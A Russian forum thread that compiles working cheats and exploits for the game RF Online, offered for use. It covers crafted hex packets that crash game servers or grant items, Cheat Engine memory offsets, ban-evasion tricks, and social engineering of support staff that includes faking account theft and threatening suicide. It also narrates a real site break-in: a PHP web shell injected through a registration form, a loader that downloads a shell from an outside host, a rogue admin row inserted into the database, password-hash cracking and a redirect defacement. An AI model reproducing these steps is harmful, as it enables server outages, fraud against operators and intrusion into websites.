Подполье РФ уровень 1 с Жуков. до января 2010

ProMeTHeuS

Пользователь
Регистрация
16 Июл 2011
Сообщения
2,356
Лайки
30
Баллы
48
Это не баг, а т.с. \"фишка\". Все заключается в том, что есть смс сервис от билайна, а подключение для билайна можно покупать по цене за 30р

Так вот: мы покупаем подключение за 30р., а получаем 100р., которые и переводим на счет в цупе

шли (старый способ): заходим в цуп и выбираем пополнение счета, выбираем способ пополнения с помощью веб мани ну или яндекса и в поле суммы вводим 0.49 за это мы получим 2 монетки и 1 р. ну а дальше считайте сами какая выгода+небольшая экономия на комиссии

100% разбан аккаунта через support

Все предельно просто и мной не раз использовалось...
Разбанивались персы которых нагло банили прямо из под бота...
Разбанивались персы которые роняли сервак...
То что написано ниже написано только для едениц... ш то в целях ознакомления)))))

ш так все предельно елементарно
Вобщем забанили у меня перса я 5 месяцев ругался с 4game, и без результатно!
ш как то раз со злости написал им вот так...
А вот если я покончу жизнь самоубийством и напишу в предсмертной записке то что все изза черствости 4game

На что в течении 10ти минут последовал ответ
Аккаунт заблокирован до ** ****** **** (седняшняя дата) года.

Ну я по приколу написал
Спасибо большое за понимание... Вы поверте для меня етот акаунт действительно очень дорог...

Дык ответ незаставил себя ждать
Нет проблем. Всегда обращайтесь

Хотя до етого они мне отвечали в течении 5 месяцев вот так...

Уважаемый пользователь, ваш аккаунт заблокирован за использование сторонних программ.
Срок - бессрочно
Пункты соглашения, которые вы нарушили:
5.8. Пользователь не имеет права использовать ошибки программного обеспечения, вмешиваться в программный код, несанкционированно получать доступ к компьютерной системе, получать без надлежащего разрешения Администрации доступ к базе данных Пользователей шгры. При обнаружении подобных попыток Администрация вправе обратиться в органы внутренних дел для рассмотрения в действиях нарушителя наличия или отсутствия состава преступления предусмотренного Уголовным Кодексом Российской Федерации или иными аналогичными законами стран - мест пребывания нарушителя.
5.21. Запрещается использовать программное обеспечение, эмулирующее присутствие игрока в шгре, заменяющее стандартный Клиент – принятый администрацией за базовый, или нарушающее нормальное функционирование серверного программного обеспечения.

Напоминаю вам, что:
4.8. Администрация не обязана предъявлять доказательства подтверждающие обоснованность применения санкций предусмотренных настоящим Пользовательским соглашением и/или отдельных его Приложений, при нарушении Пользователями условий настоящего соглашения, а также его отдельных Приложений.
Ссылки на пользовательское соглашение:


___________________
С уважением SpecialGM12


Уважаемый пользователь.
**.**.**** в **:** ваш персонаж ********* находился в зоне недоступной внутриигровыми средствами.
Поскольку этим Вы грубо нарушили Пользовательское соглашение мы были вынуждены заблокировать Ваш аккаунт бессрочно. К сожалению Ваш аккаунт не подлежит разблокировке.
___________________
С уважением SpecialGM12


Уважаемый пользователь.
В зоне **** в локации ************. **.**.**** в **:** ваш персонаж *********** находился и подбирал лут в зоне недоступной внутриигровыми средствами.
___________________
С уважением SpecialGM12

Уважаемый пользователь, если Вы не согласны с данным решением, то Вы можете создать новое обращение в support.4game.ru, выбрав категорию \"Жалобы на support.4game.ru\". Там Вашу ситуацию повторно рассмотрят.
___________________
С уважением SpecialGM12

Уважаемый пользователь.
Вам было указанно в какое время и в какой локации вами было нарушено пользовательское соглашение.
Доказательства вашего нарушения неопровержимы.
Решение о моральной допустимости подобных действий остается полностью за вами.
___________________
С уважением SpecialGM12

Уважаемый пользователь.
Разделом жалоб занимается другой отдел,
Наберитесь терпения и вам ответят.

___________________
С уважением SpecialGM12

Уважаемый пользователь.
Вопросом разблокировок занимается раздел жалоб.
В данном разделе вы можете узнать срок и причину блокировки.
___________________
С уважением SpecialGM12


Уважаемый пользователь.
Данный раздел никак не связан с разделом жалоб.
К сожалению я ничем вам помочь не могу.
___________________
С уважением SpecialGM12


Уважаемый пользователь.
Всего вам доброго.
___________________
С уважением SpecialGM12


Уважаемый пользователь, если Вы не согласны с данным решением, то Вы можете создать новое обращение в support.4game.ru, выбрав категорию \"Жалобы на support.4game.ru\". Там Вашу ситуацию повторно рассмотрят.

___________________
С уважением SpecialGM12


Уважаемый пользователь.
Вашим вопросом занимается отдел жалоб, к сожалению ничем не могу вам помочь.
___________________
С уважением SpecialGM12


В ето время в разделе жалоб!

Понимаете, у нас есть защитная система, которая фиксирует когда вы залазите под текстуры, собираете лут из под земли и так далее. Мы изучили как вы играли. Специальный гм Вам четко обозначал, что все ваши некорректный действия мы отследили и применили адекватные санкции.


шзвините, но аккаунт останется в блокировке. Правила одни для всех.


Уважаемый Пользователь, в рамках работы данного раздела, с моей стороны была проведена проверка деятельности игровых мастеров и решений по вашей проблеме, равно как и аудит деятельности при работе с вашей проблемой. Решение сотрудников было признано правильным. шзменений по данной проблеме не будет. шскренне сожалею.


Да я это понимаю, но мы изменяем сроки, или же убираем сроки только в тех случаях, когда блокирование было ошибочно. Не в Вашем случае.


Сожалею, но аккаунт останется заблокированным. Данная жалоба отклонена.





Сечете фишку как 4 game взять за ЖОПУ)))

Если мы их предупреждаем то что мы изза них собираемся лишить себя жизни или лишить жизни другого человека или совершить теракт и т д...

По законодательству РФ они обязаны пойти нам на уступки!! Ето факт и они ето понимают и ниче с етим поделать немогут!
 
Последнее редактирование модератором:

ProMeTHeuS

Пользователь
Регистрация
16 Июл 2011
Сообщения
2,356
Лайки
30
Баллы
48
Возврат сломанной при заточке вещи

1) у меня был акк с реликтом
2) я пришел в компьютерный клуб, создал там новый акк
3) съимиторовал взлом--->кражу основного акка перекинув реликт, деньги и обвес на твинко акк зарегенный в пункте 2
4) попробовал точнуть реликт на твинко акке, он сгорел
5) подождав 4 дня я написал в суппорт следуещее(щас я выложу полную переписку с супортом

Сообщение от Вас на 11.05.2009 1530
Уважаемая администрация,

7 мая, в 03:00 я последний раз я входил на свой аккаунт. После этого я уезжал, доступа в игру у меня не было.Приехав сегодня(10мая) я обнаружил ,что с моего персонажа в игре _______ были похищенны вещи. Доступ к своему аккаунту я никому не давал, даже близким. В компьютерных клубах не играл. Прошу разобраться
С уважением,______

Сообщение от RFGMs001 на 11.05.2009 15:41:47
Уважаемый _____, благодарим Вас за обращение в службу поддержки RFOnline. Ваше обращение будет направлено соответствующему специалисту. Проблема серьезная, поэтому расследование займет некоторое время, просьба проявить понимание и набраться терпения.
_________________________
С уважением RFGameMaster001
Ответы на часто задаваемые вопросы Вы можете найти в нашей базе FAQ:

Сообщение от Вас на 11.05.2009 15:47:31
проблема и правда очень серзьезнаю. Пропала вещь на которую я копил полтора с лишнем года игры в RF online. Будет очень обидно потерять ее из-за нечестных людей, которые сами ничего не могут добиться
ЖДу ответа
С уважением, _______

Сообщение от RFSGM015 на 11.05.2009 16:59:51
Уважаемый ________, пожалуйста, наберитесь терпения, игровые ценности будут восстановлены в течение нескольких рабочих дней, согласно очередности поступления обращений.
__________________________
С уважением, RFSGM015

Сообщение от Вас на 11.05.2009 17:49:40
спасибо вам, буду ждать востановления вещей...спасибо за понимание
С уважением, ______

Сообщение от RFSGM015 на 11.05.2009 1718
Уважаемый Пользователь, благодарим Вас за обращение в службу поддержки RF Online.
Приятной Вам игры.
__________________________
С уважением, RFSGM015

Сообщение от Вас на 11.05.2009 1928
возник вопрос, вернут ли мне монеты 4game которые потратил злоумышленнк, или мне будут возвращены только игровые ценности(реликтовый посох, 10кк, кольцо 20к дамагу)

Сообщение от RFSGM015 на 12.05.2009 09:55:15
Уважаемый Пользователь, монеты 4game, так же будут Вам восстановлены.
__________________________
С уважением, специалист сектора контроля и мониторинга Андрей


Мне его вернули, и все остальные вещи, твинко акк забанен

www.rf-world.info злой баг
cервер www.rf-world.info
Найден злой баг!
Там ОС меняеться на монеты через ЛК.
ш так:

Делаем персонажа с ~50к ОС (можно и менее)
Заходим в ЛК через мозилу.
Меняем ВСЁ ОС на монеты, нажимаем на старую станицу (кнопочка вернуть страницу) или что то типо того.
ш менаем заного. ш так много много раз.
Ваш персонаж уходит в минут на много много ОС, тупо удаляем перса и у вас N-ное количество монет!

Точитесь на здоровье.



Жесть как она есть (с)[color="#092Black#092"]dark[/color]

баян уже пол года не работает !!

У меня нет времени проверять , я сливаю с сайта rf-cheats
 
Последнее редактирование модератором:

ProMeTHeuS

Пользователь
Регистрация
16 Июл 2011
Сообщения
2,356
Лайки
30
Баллы
48
Смена ника персонажа бесплатно!(rfonline.ru)

штак я расскажу как сменит ник персу на оффе.
1) заходим в Рф и удаляем перса ник которого мы хотим сменить
2) далее просим друга с другим ip адресом создать персонажа за другую рассу с таким же ником как у только что удаленного чара.
3) пишем обращение в суппорт с текстом типа случайно удалил перса хочу восстановить. в ответ приходит сообщение типа ок мы вам восстановим перса но ваш ник увы уже занят так что придумайте новый ник.


Лишь один минус , саппорт не очень быстро работает

Если у вас есть посох +14 (другим оружием не пробовал) - вы можете стать бессмертным!..

Вам нужно лишь взять, и обратно всунуть ваш посох (как при потхаке, дерганье банок), или если работает любое другое оружие забвения, и удивлятся рстом статов!

Разогнал до 90к дамага, и 8 тысяч доджа, в итоге соло зафармил варассу, и не прогнулся под 3-мя лампами и нубьем, будучи игроком, оторый там всего 2 дня.

п.с.

шногда если перестаратся, статы становятся \"0\" - и придется все заного, там это рандомно помоему.

Чиним МАУ на расстоянии (rfonline.ru, 2.2.3)

Чиним мау на растоянии , работает на 2.2.3 , тоесть на BSB

Короче, когда вы ловили пакет на починку у \"Поставщика Мау\" и отправляли его на расстоянии, клиент выдавал подобного рода ошибку : \"Нельзя починиться на расстоянии и т.д.\" Если мы просто ловили и отправляли пакет на окно с : \"Продать/Купить\", \"Тюнинг\" и т.д. тоже выдавало такую же ошибку. НО, на 2.2.3. клиенте я нашел новый баг! В новом апе появились \"Устройства вызова торговца MAU\" Когда я купил данные итем, юзанул его, появилось окошко с \"Продать/Купить\", \"Тюнинг MAU\" , я ткнул на \"Тюнинг\" и записал пакет, и после выхода с появленым окошком, отправил заново этот пакет, выдало ошибку типо : \"Нету предмета\" Но не беда, я купил еще 1 такой же итем, юзанул его, появилось окошко с \"Купить/Продать\" , \'Тюнинг\' и т.д. и я записал пакет на починку с данного устройства, и Вауля!!! Пакет запахал, и написало \"Ремонт МАУ Удачно завершен\" Вот собстно мои пакеты:
Пакет на починку Голиафа: 09 00 17 07 [color="#092Red#092"]03[/color] 01 00 00 00
Пакет на починку Балисты: 09 00 17 07 [color="#092Red#092"]00[/color] 01 00 00 00

Красным выделены CID машинок. Подбирайте свой CID для машинки, записывайте в блокнот и юзайте!
ЗЫ: Чинить мяву можно, только тогда, когда она отозвана и Вы в ней не сидите

PvpWar ( Обход бана )

Проверено - работает. 100%. ш без всякой лишней помощи, и разборок с админинстрацией - никто даже ничего не поймет.

В общем как я заметил, когда меня забанили - то банально стерли всех персов. шграть с нуля мне не хотелось, и я решил найти способ разбана персов.
1. Если мы знаем что спалились или еще что то, что может повлеч за собой бан, мы идем в цуп, и удаляем перса сами. Если же вы нашли тему или что то подобное где уже утверждено что вы забанены - пока вы не вышли из игры это в силу не вступит, потому можно подождать появится ли темка на форуме или нет и тд.
2. Вас забанили, но вы удалили перса, для страховки перед баном содаем перса в другой ячейке с подобным ником, чтобы было кого банить. После бана идем в цуп, и вашу вами же удаленную основу теперь можно восстановить, и не важно что они якобы забанены. ПРосто в цупе ищем перса - кликаем \"восстановить\" - и радуемся.
 
Последнее редактирование модератором:

ProMeTHeuS

Пользователь
Регистрация
16 Июл 2011
Сообщения
2,356
Лайки
30
Баллы
48
В ГШ чужой расы rfonline.ru

Самый простой способ реализации на оффе, шМХО
Как всегда в этом нам помогут ГМы, но знать они об этом не будут =) В шопе появился допинг, позволяющий портануться к игроку. Портануться можно к любому персонажу своей расы, даже если это ГМ. Осталось только чтобы ГМ был такой-же расы, что и вы. А загнать ГМа в чужой ГШ не так уж сложно, даже если он не в игре вызвать можно через саппорт(проорав что повсюду боты) и так-же загнать в нужную локу(проорав что повсюду боты)

Регистрация аккаунтов на rfonline.ru (быстрый мульти-рег)

Вот в чем суть... Поможет продвинутым ботоводам чтобы регать аккаунты на rfonline.ruСкрытый текст требуется (100 сообщение(ий), сейчас у вас 250):

Всем извесно что, чтобы зарегать аккаунт на офф сервере надо перейти по ссылке
Вводим данные логин-пароль.
3e49449528e4.jpg

Емейл вводить не обьязательно правильный.
ш главная фишка! Работает через Оперу(на шЕ вроде не будет работать). Вводим один раз правильно капчу(символы с картинки) и жмем Зарегистрироваться. Видим окно что все прошло успешно. Берем жмем Назад(на панели в Опере). Меняем логин, пишем пасс А СшМВОЛЫ ОСТАВЛЯЕМ ТЕ ЖЕ! Они не меняются при одной сессии. Удобно делать если логины делать типа nickname001, nickname002 ... Все получается быстро и не надо долбать себе голову с тупым вводом капчи. Планирую написать программу для такой регистрации. Как напишу то выложу чуть позже.

Передаем непередаваемое в 2.2.3

1) Запускаем программу Cheats Engine находим процесс рф онлайн.

2) Покупаем осадку, если у вас есть то не тратим зря деньги.

3) Пишим в CE название осадки.

4) На картинке показано где изменять числа,меняем числа на свое усмотрение только числа должны быть одинаковые.

5) Когда поменяли числа меняем в инвентаре осадку местами,у вас будет оружие или любой предмет.

6) Выбрасываем осадку и сразу поднимаем,у вас должно появится 121осадка.

7) Теперь смело кидаем в осадку что не нужно в инвентаре даже вещи которые на ауке висят и антиграв. ш туда же кладем вещи которые нам надо передать

8) Полностью заполняем инвентарь какой нибудь фигней вроде хилок по 125 и делаем релог

9) после релога вещи с вас выпадают и можно чтоб их поднял тот кому их надо передать!

Крашим 6 up

ловим на любой фришке пакет на покупку чего либо в шопе и подменяем 1й байт содержания на 00 а 2й на 6B и скармливаем пакет ап6 серверу. серв падает.
пример пакета:
320039030100C80000000A1615003E00010000000001000000 000000000000 00000000000000000000000000000000000000
01меняем на 00
00меняем на 6B
проверено только что на абисе и пвпваре.
ЗЫ на пвпваре приходится обходить маску 00 39 03 поэтому увеличиваем длину пакета


надеюсь этого не было=)



Тестить на данный момент лень , но знаю что на фришках работает

Кикаем любого игрока с сервера

Качаем Cheat Engine под Файнал Ап

шщем свой ник ( как обычно ) и записываем его в таблицу

Nick - адрес ника

Чтобы вычислить адреса хаков, берем инженерный калькулятор и делаем некоторые рассчеты...
Все цифры в hex значениях !!!

SpeedHack = Nick + BF8 (hex значение)
WallHack
x = Nick + 40
z = Nick + 44
z = Nick + 48
FlyHack = Nick + 65
LvlHack = Nick +3084

Адреса Zoom\'a
Zoom bellato 017ECB00
Zoom cora 017ECB08
Zoom acr 017ECB10
Zoom real 017ECAE4


Чесно говоря так и не смог полностью в этом разобратся , но думаю сработает.
 
Последнее редактирование модератором:

ProMeTHeuS

Пользователь
Регистрация
16 Июл 2011
Сообщения
2,356
Лайки
30
Баллы
48
Роняем сервер ап 6

в 6м апе есть краш сервера через почтовый пакет

стандартный пакет почты:
Код:
fb003a01c0e4f0e5f1e0f200000000000000000000d2e5ece0000000000000000000000000000000
0000d1eee4e5f0e6e0ede8e5000000000000000000000000000000 00000000000000000000000000000000000000000000000000 00000000000000000000000000000000000000000000000000 00000000000000000000000000000000000000000000000000 00000000000000000000000000000000000000000000000000 00000000000000000000000000000000000000000000000000 00000000000000000000000000000000000000000000000000 00000000000000000000000000000000000000000000000000 0000ffff0001000000
если подменить в этом пакете байты ffff
на ff0e и отослать серверу он ляжет. содержание, адресат, тема письма неважны.

тестировалось на абисе и пвпваре, правда около месяца назад

в большинстве случаем маски, вбиваемые в фильтр пакетов включают в себя 2й байт длины и тип пакета и 2я маска идет, если такое возможно, тип пакета и 1й байт содержания

на пвпвар стоит фильтр пакетов так что к пакету добавляем несколько нульбитов чтоб длина его стала 0001

обязательное условие для действия пакета-5 голды в инвентаре.
просто ловим пакет на почту, правим те 2 байта и шлем

Баг на создание гильдии.

Несмотря на то, что для создание гильдии необходимо 23кк, группа из 8-ми персонажей 30+, можно это самое ограничение обойти

обмануть сервер можно с количеством человек в группе. для этого нужно быть ее лидером. создав группу из 2 игроков можем создать и гильдию. зачем? вам решать, думаю можно придумать как извлечь из этого выгоду

для запроса на создание гильдии, говорим клиенту что в группе нас восьмеро и все 30+
Код:
1500 1b01 хх хх хх хх хх хх хх хх хх хх хх хх хх хх хх хх 00
это образец такого пакета в впе, в котором: длинна пакета, id пакета и название гильдии

Магистр бафы 2.2.3

Я тут узнал что магистр пашет на 2.2.3
Думаю это уже есть на втором уровне.
Но всё же :bl:

57162,59090,'Lumer',2305,'Re: Магистр бафы 2.2.3',1250068829,'Всё верно, на пвп варе работают магист баффы (маг) у белок в т.ч. уворот, лечение и т.п.

также работают атакующие магические спеллы магистра(!) атакуют без анимации, на чв или в замесах полезно - однако палевно при добивании чара, т.к. там видно от какого каста погибаешь.

Ну и наконец скиллы (мили+дд) в магистре к сожалению не работают. Однако что нам мешает взять мага и бафнуть своем милишнику \\дд магистр и идти спокойно качаться

На офе работете?

скиллы точно не работают. а вот маг баффы не пробовал, т.к. у меня на оффе чар не маг. а у твинкочучи не открыта элита. Сейчас попробую кстати.

[color="#092#666686#092"]Добавлено через 8 минут[/color]
хотя насколько я помню на оффе маяков магистра нету...

на офе магистр маяков нет. а откуда их брали? если есть способ комбинирования то можно тупо скрафтить.

Донат без %, безоткатные квесты и 7 дырок в предметах

1. Донат без %

Суть заключается в том, что при переводе денег на счет в rfonline.ru можно немного сжульничать, только на это уйдет больше времени

Когда передаем сумму больше 9 рублей с нас снимают %, но если переводить сумму частями меньше 9 рублей, то % не снимается. Долго конечно, но зато без переплат



2. Способы сделать квесты безоткатными

а). Взять квест операция N до 24 часов и закончить его после 24 часов, т.е. на следующий день

б). Даже не повторяющиеся: взять квест, но не делать его до конца, положить серв (всего то делов ) и вуаля - можно взять квест у нпс второй раз



3. Делаем предметам в НПС 7 дыр

Всем извесно, что на руоффе сейчас продаються белые и интовые шмотки от 41 к 50 (инт только до 47) в НПС. Проблема в том, что в шмоте нету дырок, потому казалось бы неактуально покупать такое в НПС

Но на самом деле это не так. штак, берем покупаем нужную нам шмотку. Потом просто выбрасываем ее из инвентаря и поднимаем опять. ш теперь у нас в рюкзаке отличный семидырочный шмот. Очень актуально для тех, кто собираеться точить модиком тапки для фармеров, ведь всегда можно купить тапки на 7 дыр белые
[/HIDE]

8кк за 3 минуты - пробегаем данж соло

За материал благодарим: alexir

штак, все прекрасно знают, что после апа, старые ключи в 50 циту превратились в ключи для данжа 36-40 и стали бесполезными. Так вот, не знаю что ГМы с ними наделали, но теперь данжи этими ключами открываются БЕЗ пати и на ЛЮБОМ уровне (к сожалению возможности передать их не было, и тестилось на персонаже 50лвл, спокойно проходил)

Данж на количество, убить 300 мобов, на 50 лвл укладываешься во времени без проблем. В итоге мы имеем:

- 1кк за прохождение данжа

- вы можете не состоять в пати, а бегать в соло

- игроки, которые находились рядом с вратами в момент их открытия ТОЖЕ могут зайти в данж, вы окажетесь вместе

- из пункта 3 могу предположить, что можно собрать к себе в пати 7 твинков, в итоге с одного данжа будем иметь 8кк (на него уходит 3 минуты)

Возможно в данж можно зайти более чем 8 игрокам, кому надо попробует и отпишется

Смена специализации?

У Героя есть кнопочка \"Сбросить класс\". При нажатии по ней, отправляется пакет 05000B1802. При этом мы получаем отказ.
Если отправить пакет 05000B1801 серверу, то сбросится специализация, все классовые умения пропадут из своего окошка (но пакетами их можно будет использовать).

После релога специализация возвращается. Перейти на другую специальность у командующего никак нельзя (пробовал и пакетами, что только не делал).

Теперь вопрос: может ли иметь смысл этот временный сброс специализации? Сбрасывается специализация в клиенте, или и на сервере тоже?

[color="#092#666686#092"]Добавлено через 16 часов 28 минут[/color]
П.С: Пашет на РУОфе.
 
Последнее редактирование модератором:

ProMeTHeuS

Пользователь
Регистрация
16 Июл 2011
Сообщения
2,356
Лайки
30
Баллы
48
Кач дебафов - быстро и просто соло (работает на оффе)

Баг, собственно, заключается в том, что мы можем дебафать самих себя, когда мы враги расы или под пк потом.
Для кача мы берем кросса воин-маг и становимся ВРом. А дальше качаемся макросом в афк. Можно качать и через экспертное очищение.

Единственный нюанс бага - необходимо подправить сам дебаф (в памяти или через едф файл).
1. находим дебаф.
2. меняем выделенный байт на 01.

3. теперь мы можем дебафать себя, если мы вр или под пк потом. ПТ идут, дебаф качается.

Да, работает и на пиратках (включая парт2), и на офе.
2b70bf1908f7.png

Баг с банкиром (не платим за то, что кладём\\вытаскиваем вещи)

Вообщем суть бага заключается в том,что одинаковые итемы(ну которые по край не мере в стопку складываются)можно подменять в банке например:мы хотим хранить в банке рр засовываем туда пачку,что бы вытащить нужно заплатить около 100к,но мы не вытаскиваем целую пачку ))берём из рюкзака 1рр и меняем местами с пачкой 99шт,за это мы денег не платим и того у нас в рюкзаке пачка а в банке 1шт)))таким методом вытаскивать можно только целые пачки)если так тыкаем на другую вещь,то мы вылетаем из игры((( СЕРВЕР rfonline.ru,на котором тэстил(руссофф)


Решил выложить в подполье , лишь потому что все говорят что работает на www.rfonline.ru


:wtf:

Шоп шмот без према.

штак собствено три пакета
Код:
0D000B21360200000001FFFFFF Шоп шмот Колечко + 25 атака! 
 0D000B21360200000101FFFFFF Шоп шмот Колечко +20 зашита! 
 0D000B21360200000201FFFFFF Шоп шмот Колечко +20 уклон!

Пока что для Кор Потому как нет Акра и белки выше 43лв
Но при посылки этого пакета акру приходит шмот и т.д только одеть он его неможет только меч на бег и гениратор доступен.

Да и трабла втом что приходится постоянно добавлять после релога Т.е Посылать пакет зоново!

ш ещё не получается поймать пакет на стартовые коробки При создании нового чара!

Тестите , может чтото намудрите по лучше

Баг на деньги для фришек (необходима проверка)

штак, в нашу студию пишут телезрители..и пишут они нам свои баги

НА этот раз письмо от товарища Жеки с багом на деньги для фришек - прошу любить, жаловать но сначала проверить :ban:


Лучше всего реализовать в WPE_PRO. есть готовый пакет на скрине, но лучше его поймать самому, начнем с 0, идем к герою, и покупаем ГЛ шапку, ловим пакет...Находим нужный пакет покупки шапки и вставляем его в фильтр. Далее шз пойманного пакета нам нужно 3 значения. (Offset -007 -Это значение расы , у коры оно 59), (Offset -0017 это место положение шмотки, нам нужно поставить значение арх куртки 45 лвл --->0С), ну и главное значение, благодаря которому мы покупаем так дешего арх шмотку - это ( Offset -021, там по умолчанию стоит 01, мы подменяем на 48)!!! В фильтре это выглядит примерно так!

Search 19 00 13 00 0C 01 59 00 00 00 01 00 00 00 00 00 0C 00 00 00 01 04 00 00 00
Modify 48

Сохраняем фильтр, ставим над ним галку, тыкаем кнопку ОН, заходим в игру, и покупаем арх куртку не за 60+кк, а за 7кк, ну и продаем за 23кк+ , разница между 7кк и 23кк наш навар, за 7 минут я делаю 2ккк!!! Покупать надо по 1 куртке, и для первой покупки надо 68кк, у акров кст надо покупать голову 45 самую первую. Собственно все.



Утверждает что: работает уже как 2 года подряд, недавно работал на руоффе, работает на всех фришках кроме абуса и пвпвара

Прошу проверить :z:

Полный контроль над RF сервером через админ-панель (без прав админа)

Как-то вечером, (ну это для меня вечер =) а так это было гдето 2:30 ночи )) ) постучал ко мне f1refox, говорит я тут игрушку одну онлайновскую расковырял, но добить не может ) в общем там было вот что: для регистрации в форме указывается логин, пароль etc.. и после успешной регистрации создается файл логин_ch.php с содержимым которое указано в форме в качастве параметра value для поля sample... выглядела форма так:

reg_form.html
Код:
<form action=\"http://game.site.com/reg.php\" method=\"post\">
<input type=\"hidden\" name=\"x\" value=1>
логин: <input type=\"text\" name=\"login\" value=\"\">
пароль:<input type=\"password\" name=\"pas1\">
подтверждение пароля:<input type=\"password\" name=\"pas2\">
<td><input type=\"radio\" checked=1 name=\"sample\" value=\"текст_для_запси_в_файл\">
<input type=\"submit\" value=\"зарегистрировать пользователя\" name=\"reg\">
</form>
3-2-1 Поехали!

шменно в input\'e с name=sample и содержится тот текст который будет записан в файл логин_ch.php !!! =)))) Ну вы уже наверное догадались что можно с этого поиметь ))) не долго думая я на накатал скрипт: <? system($_GET[cmd]); ?> который был вставлен в value поля sample нашей формы... конечно все символы < и > были заменены на < и > соответственно =)

дальше я зарегался с логином superhacker => создался файл superhacker_ch.php с содержимым <? system($_GET[cmd]); ?>, я набил в адресной строке браузера путь до файла и как я предполагал мне был выдан результат:
Код:
Warning: system() [function.system]: Cannot execute a blank command in /path/to/script/superhacker_ch.php on line 2
дальше я набрал в браузере и крупно обломался! результата не было никакого... только пустые строки... я набивал разные команды, пробовал заливать другие скрипты с ф-иями passthru() и exec() но все равно ничего не выходило... SAFE MODE был включен... после часа экспериментов со скриптом я огорчился - все кавычки в тексте который записывался в файл экранировались... и скрипты выдавали ошибки в синтаксисе... отсюда исчезли очень многие возможности... ковырять другие скрипты не хотелось и я пошел спать... время было уже около 5 утра...

В бой с новыми силами!

Проснулся я рано... в 11 часов утра... сразу поивилась идея... я написал скрипт:
Код:
<xmp> <? if(!empty($_GET[file])) readfile($_GET[file]); ?> </xmp>
Как видите это обычный скрипт для чтения файлов... прочитав несколько файлов я надыбал пути к системным директориям движка сайта ( двиг там стоял e107 ) но в ручную брутить имена файлов не хотелось ))), игра была самопальной... я на некоторое время забил на это дело и решил пойти позавтракать... и тут я понял что можно сделать!!! скрипт с include-багом! я накатал скрипт:

inc_script.php:
Код:
<? if(!empty($_GET[inc])) include($_GET[inc]); ?>
и решил проверить... я боялся того что из-за SAFE MODE будет нельзя инклудить файлы с других серверов, но нет! это было возможно!!!
Я накатал простенький скрипт, который бы загружал шелл с другого сервера и сохранял его в текущую диру с именем out.php, залил его на народовский фтп:

load_shell.php
Код:
<?
$file = fopen(\"http://jenizix.narod.ru/shell.php\",\"r\");
$out = fopen(\"out.php\",\"w\");
while(!feof($file))
fputs($out,fgets($file));
 
fclose($file);
fclose($out);
?>
Теперь осталось набрать в браузере: шелл был залит на сервер!!!

Ориентирование на местности

Побродив по каталогам на сервере я нашел файл конфигурации e107 для MySQL... Выдернул от туда логин, пароль и имя базы, задампил таблицу e107_user с данными о юзерах... создав файл с логинами и хешами паролей я поставил их на брут... зачем сам не знаю ))), а тем временем вставил в таблицу нового юзера с админскими правами, вот таким запросом:
Код:
INSERТ INTO e107_user (`login`, `password`, `user_admin`, `user_perms`) VALUЕS (\'Jenizix\', \'MD5_хеш_пароля\', \'1\', \'0\')
запрос выполнился успешно и в таблице появилась новая запись... я проследовал в админ-панель которая находилась по адресу и успешно залогинился! Все! Теперь админка у меня в руках! там крутилась FreeBSD 5.3-RELEASE-p5 но права были никакими... поэтому мы решили просто дефейснуть сайт и все =))) да и сайт не очень раскрученый... там всего 129 пользователей... но как я уже сказал - права были никакими ((( поэтому /index.php нельзя было редактировать... на сервере можно было писать только в директорию где создавались файлы юзеров: поэтому было решено залить туда файл дефейса а в админке изменить поле title на вот такой java-script:
Код:
<script>location.href=\'http://site.com/game/chel/deface.html\';</script>
- редирект на файл дефейса... за это время у меня сбрутилось больше половины хешей... опять таки нафиг они мне нужны ))) и вот тут я разочаровался в Русских людях... наивные... думают поставив пароль qwerty или 123456 они обезопасили себя )))) и самое обидное, что такие пароли были там почти у всех... даже у главного админа пароль был - 12345... я чуть от смеха не упал... на этом мы оставили сервер в покое... Вот такие баги бывают в онлайн играх

шсточник:
 
Последнее редактирование модератором:

ProMeTHeuS

Пользователь
Регистрация
16 Июл 2011
Сообщения
2,356
Лайки
30
Баллы
48
срочно на тест.
все помнят дюп по системе координат?

один человек показал скрин, и сказал, что надо пропатчить руоф клиент из частей филипинсокго и корейского клиентов. тогда будет работать дюп.
самому нет времени и возможности тестить.
есть кто админы серверов? как делается фикс координат? вобщем думайте)

маловероятно, что это реально работает, так как на данный момент есть 2 вещи:
1) Сканер от фдкора, который выводит список народа кто дюпнул (их идишки, а там уж в папке хистори серва глянуть несложно кто кому передавал)
2) Фикс в том, что перс после релога появляеться в гш, в любом случае и откуда хочешь. там ещё какая то дополнительная фигня, но всё же сильно сомневаюсь)

Баг на разбан в ЛК FDCore

При создании чара обязательно ставим мастер слово. Когда админ банит заходим в раздел забыли пароль, вводим логин и мастер ответ. Заходим в ЛК и ставим себе по новой пароль. Все, можно заходить и играть

(с) zayas007

Не знаю, насколько эт
а информация актуальна, сообщил автор. Возможно он ошибся

Премиум Вещи

[color="#092Yellow#092"]Отправляем:
Код:
[B]0d 00 0b 21 d0 02 00 00 00 02 ff ff ff[/B]
[color="#092Red#092"]![/color] [color="#092Orange#092"]После релога вещи исчезнут![/color][color="#092Red#092"]![/color]

Есть ещё пакет, чтоб вещи оставались даже после релога. Поэтому этот пакет не столь ценен как \"ТоТ\" пакет.[/color]

Дюп 2.2.1
[hide="25"]
Волшебный пакет кладет 2.2.1 сервер
Код:
1900073f [B]09[/B] 000001 [B]3939000000000000000[/B] 000000000000000

ервый жирный байт может быть любым кроме самых первых значений (грубо - от 09 до ff)

Жирные начиная с 39 - это ник чара, который должен быть в игре. Можно наш же


Нашел вот в своих архивах, было?

БАГ У БАНКшРА

вчера 10.07.09!
я танк 50 в rf-online, подошел к банкиру и решил одеть греник 50,
положил греник 50 в банк ,взял одноручку и положил на место греника 50 в банке и воля они поменялись!!!!!

теперь бегаю с греником 50!!!

[color="#092#666686#092"]Добавлено через 4 минуты[/color]
вы скажете вигня!
но сам факт что теперь работает подмена вещей!!!!
раньше был дисконет но щас нет!!!!

Покупка вещей на расстоянии (2.2.3)

Баг в том, что в новом апе в пакете на покупку шмота или айтемов появились новые 4 байта типа целое

Если они равны 01 00 00 00 то айтем можно купить из любого места.
Дабы не утомлять вас сильными подробностями скажу что вам нужно запомнить требуемый пакет на покупку той или иной шмотки

Затем поменять 10 байт на 01 и слать этот пакет по мере необходимости. Все просто... На самом деле такие флаги появились много где

Правда что бы увидеть купленное, вам нужно сделать логаут и снова войти на чара. Деньги за покупку снимаются.

Создание персонажа.

Никак не могу понять корейцев. шли они не фиксят баги, или они их фиксят через *опу.

Баг древний, шо ппц. Но пашет до сих пор.

Нормальный пакет на создание чара выглядит так:

